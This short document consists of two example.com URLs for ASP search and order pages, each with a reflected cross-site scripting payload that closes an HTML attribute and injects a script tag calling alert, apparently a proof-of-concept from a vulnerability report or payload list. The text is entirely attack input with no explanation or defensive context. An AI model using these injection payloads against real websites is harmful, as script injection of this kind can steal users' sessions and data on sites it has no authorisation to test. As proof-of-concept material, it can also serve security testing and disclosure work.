http://example.com/path/search.asp?filename="><script>alert("1")</script>

http://example.com/path/order.asp?cat=&apage=&albumid=&page="><script>alert("1")</script>